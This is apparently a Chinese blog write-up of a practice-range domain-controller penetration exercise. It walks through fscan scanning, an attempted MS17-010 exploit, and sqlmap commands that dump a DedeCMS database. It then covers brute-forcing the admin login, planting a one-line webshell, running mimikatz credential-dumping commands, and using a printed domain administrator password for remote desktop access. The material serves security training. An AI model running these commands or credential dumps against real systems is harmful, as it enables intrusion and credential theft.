云尘靶场---铁三域控 --内网渗透

域就像是我们一个机房,老师的电脑控制很多很多电脑,这个机房就像一个域,老师是管理员身份,可以控制所有学生的电脑

下文的141就像老师,192.168.60.100就像学生的电脑
 

用openvpn连接

用fscan扫

发现存活2台机子 172.25.0.123,172.25.0.141

后面很明显提示141机子有永恒之蓝

那先来复现一下看看

172.25.0.141 MS17-010      

云曦暑期学习第六周——kali-CSDN博客

但是发现无法利用永恒之蓝 ,只能支持64位的。但是这是32位的win7

没成功,试下别的机子

172.25.0.123:80

80端口开放

织梦 有点熟悉了都

    

先用dirsearch扫一下

把返回值为200的都看了一下,/sql感觉可以利用

用sqlmap跑一下

sqlmap.py -u http://172.25.0.123/sql/?id=2 --dbs

sqlmap.py -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 --tables

sqlmap.py -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 -T flag  --dump

 得到flag2

 flag1确实是不知道怎么打了

可以找到这个cms的后台管理登录地址/dede/login.php

我们先尝试弱口令admin/admin失败了

当然用bp爆破

登进去咯

flag1小隐秘

在附件管理的地方发现可以上传文件,但是这里不需要上马,在文件式管理器里面可以看到文件

根目录中看到flag

直接点开咯,有flag3了

写个一句话木马,没用哥斯拉,直接把1.php文件修改了

看看有没有上传成功

ifconfig

发现只有两个内网,所以123到这就结束了

172.25.0.141

然后然后!!!原来是在爆123这台机子的时候有admin这个表

sqlmap.py -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 -T topsec_admin --dump

远程连接一下

 登进去之后看到flag4

ipconfig 看到新的域

    privilege::debug
    sekurlsa::logonpasswords full

看了wp也没得到解密后的password,不知道怎么解

 使用别人得到的

administrator

TopSec_2017

使用fscan扫一下

远程桌面连接

--192.168.60.100

找到flag5

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值